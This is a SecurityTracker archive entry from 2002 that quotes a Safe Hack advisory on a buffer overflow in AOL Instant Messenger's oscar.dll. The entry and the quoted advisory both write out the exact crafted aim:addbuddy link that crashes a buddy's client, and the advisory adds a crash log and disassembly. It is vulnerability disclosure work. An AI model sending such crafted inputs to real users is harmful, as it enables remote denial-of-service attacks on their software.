SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   AOL Instant Messenger Vendors:   America Online, Inc.
AOL Instant Messenger (AIM) Short Message Feature Buffer Overflow Lets Remote Users Crash the AIM Client Software
SecurityTracker Alert ID:  1003713
SecurityTracker URL:  http://securitytracker.com/id/1003713
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 1 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Tested on 4.8.2646, other versions are vulnerable
Description:   Safe Hack reported a buffer overflow in the AOL Instant Messenger (AIM) software. A remote user can cause another user's AIM client to crash.

It is reported that AIM contains a buffer overflow vulnerability in the file oscar.dll that can be triggered when one user clicks on a buddy link to send a short message to another user.

A remote user can send a specially crafted short message to another AIM user to trigger the overflow.

The following demonstration exploit steps are provided:

1- Make sure you have AIM 4.8.2646 installed
2- Open a new IM window and click the link button to setup a hyperlink for your buddy.
3- Input the exact text into the link aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678, 12345678,12345678,12345678,12345678,12345678,12345678&groupname=12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,
4- The text can be anything as long as it meets the format of 8 characters for each word to add as a screenname and a groupname, the instances should be 11 for the screenname and 10 for the groupname
5- A memory dump will occurs as soon as the hyperlink is clicked by either side (You or your buddy).

Impact:   A remote user can cause another user's AIM client to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aol.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  AIM Buffer Overflow


This is a multi-part message in MIME format.
--------------5303365F68AD2CB87B0B8119
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

http://safehack.com/Advisory/aimbuffer.txt
--------------5303365F68AD2CB87B0B8119
Content-Type: text/plain; charset=us-ascii;
 name="aimbuffer.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="aimbuffer.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           .--------.
                          / Advisory \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : All versions of AIM including the beta 4.8.2646      :
Type             : Local/Remote Buffer Oveflow                          :
Date             : 29-02-2002                                           :
Author           : NtWaK0 & Recon @ www.SafeHack.com                    :
+-----------------------------------------------------------------------.
We think this was not reported. Nothing was found publicaly about this. 

+------------------.
Crash of AIM Client \
+--------------------`--------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments though it may be false. The opinions expressed in this      :
advisory and program are my own and NOT of any company.                 :
In Fact I do not work for no one at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information.                                             :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
If you are running any version of AIM (Aol Instant Messenger) you are   :
affected with this crash, vendor has been informed.                     :
                                                                        :
AOL's Instant Messenger client (AIM) has contain a buffer overflow      :
vulnerability in the file oscar.dll.                                    :
Instant Messenger allows AOL users to send short messages between       :
its users. A buffer overflow in oscar.dll in al register.               :
                                                                        :
+---------------------------+                                           :
 >>> Test OS Applications <<<                                           :
+---------------------------+                                           :
Tested on all version of Microsoft Windows Family of OS with the latest	:
beta version of AIM 4.8.2646                                            :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
Normaly I do not use AIM. But a friend of mine "Recon" told me about a  :
strange problem he found. Since I am curiouse I did install AIM and done:
some test to find out what was going on again thanks Recon.             :                                           
                                                                        :
AOL's Instant Messenger client (AIM) has contain a buffer overflow      :
vulnerability in the file oscar.dll.                                    :
Instant Messenger allows AOL users to send short messages between       :
its users. A buffer overflow in oscar.dll in al register.               :
                                                                        :
The buffer Overflow will happen if you send a special crafted message to:
an AIM user.                                                            :
                                                                        :
                                                                        :
                                                                        :
To see the buffer Overflow do the following steps:                      :
1- Make sure you have AIM 4.8.2646 installed                            :
2- Open a new IM window and click the link button to setup a hyperlink  :
   for your buddy.                                                      :
4- Input the exact text into the link                                   : 
   aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
   12345678,12345678,12345678,12345678,12345678,12345678&groupname=     :
   12345678,12345678,12345678,12345678,12345678,12345678,12345678       :
   ,12345678,12345678,12345678,                                         :
                                                                        :
5- The text can be anything as long as it meets the format of 8         :
   characters for each word to add as a screenname and a groupname, the :
   instances should be 11 for the screenname and 10 for the groupname   :
6- A memory dump will occurs as soon as the hyperlink is clicked by     :
   either side (You or your buddy).                                     :
                                                                        :
This was taken after the buffer overflow occured from Drwatson log      :
                                                                        :
function: o_strncpy                                                     :
        1218b4f9 8b4508           mov     eax,[ebp+0x8]          ss:00c :
        1218b4fc 3b450c           cmp     eax,[ebp+0xc]          ss:00c :
        1218b4ff 7419             jz      LoadRendezvousString+0x39f6 ( :
        1218b501 8a06             mov     al,[esi]                      :
        1218b503 8807             mov     [edi],al                      :
        1218b505 47               inc     edi                           :
        1218b506 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b509 46               inc     esi                           :
        1218b50a 43               inc     ebx                           :
        1218b50b 8a06             mov     al,[esi]                      :
FAULT ->1218b50d 8807             mov     [edi],al                      :
        1218b50f 47               inc     edi                           :
        1218b510 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b513 46               inc     esi                           :
        1218b514 43               inc     ebx                           :
        1218b515 803e00           cmp     byte ptr [esi],0x0            :
        1218b518 75cf             jnz     LoadRendezvousString+0x3bc5 ( :
        1218b51a 8b4d0c           mov     ecx,[ebp+0xc]          ss:00c :
        1218b51d 3bf9             cmp     edi,ecx                       :
        1218b51f 7312             jnb OscoreUseCurrentAcceleratorTable+ :
        1218b521 2bcf             sub     ecx,edi                       :
        1218b523 33c0             xor     eax,eax                       :
                                                                        :
Below is a portion of the asm code for the file oscar.dll               :
===============================================                         :
.text:1218B4E9 loc_1218B4E9:           ; CODE XREF: o_strncpy+61j      :
.text:1218B4E9                 cmp     edi, [ebp+lpsz]                  :
.text:1218B4EC                 jnb     short loc_1218B533               :
.text:1218B4EE                 push    esi             ; lpsz           :
.text:1218B4EF                 call    ds:CharNextA
.text:1218B4F5                 cmp     eax, ebx
.text:1218B4F7                 jnz     short loc_1218B50B
.text:1218B4F9                 mov     eax, [ebp+arg_0]
.text:1218B4FC                 cmp     eax, [ebp+lpsz]
.text:1218B4FF                 jz      short loc_1218B51A
.text:1218B501                 mov     al, [esi]
.text:1218B503                 mov     [edi], al
.text:1218B505                 inc     edi
.text:1218B506                 inc     [ebp+arg_0]
.text:1218B509                 inc     esi
.text:1218B50A                 inc     ebx
===============================================
.text:1218B50B loc_1218B50B:           ; CODE XREF: o_strncpy+40j
.text:1218B50B                 mov     al, [esi]       
.text:1218B50D                 mov     [edi], al  ; <<<---HERE IS THE P
.text:1218B50F                 inc     edi
.text:1218B510                 inc     [ebp+arg_0]
.text:1218B513                 inc     esi
.text:1218B514                 inc     ebx
.text:1218B515                 cmp     byte ptr [esi], 0
.text:1218B518                 jnz     short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A:                           ; CODE XREF: o_s
.text:1218B51A                                         ; o_strncpy+48j
.text:1218B51A                 mov     ecx, [ebp+lpsz]
.text:1218B51D                 cmp     edi, ecx
.text:1218B51F                 jnb     short loc_1218B533
.text:1218B521                 sub     ecx, edi
.text:1218B523                 xor     eax, eax
.text:1218B525                 mov     edx, ecx
.text:1218B527                 shr     ecx, 2
.text:1218B52A                 repe stosd
.text:1218B52C                 mov     ecx, edx
.text:1218B52E                 and     ecx, 3
.text:1218B531                 repe stosb
.text:1218B533 
==================================================
                                                                        :                                                        
                :
                                                                        :
Here is the stack variables                                             :
===========================                                             :
00000000  s              db 4 dup(?)                                    :
00000004  r              db 4 dup(?)                                    :
00000008 arg_0           dd ?                                           :
0000000C lpsz            dd ?                    ; offset (FFFFFFFF)    :
00000010 arg_8           dd ?                                           :
                                                                        : 
This issue has not been tested on third party software that supports    :
the oscar protocol                                                      :
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
We could not located AIM email to send them this issue.                 :
+-----------------------------------------------------------------------.





-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPH+L6/PoW9fFNsN8EQLySQCg8iMY/53lUJxMnzI4XJCJqYbgSukAoNke
7ErBTjxRHacFmbkm/BoE6Kfq
=Oe3u
-----END PGP SIGNATURE-----

--------------5303365F68AD2CB87B0B8119--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC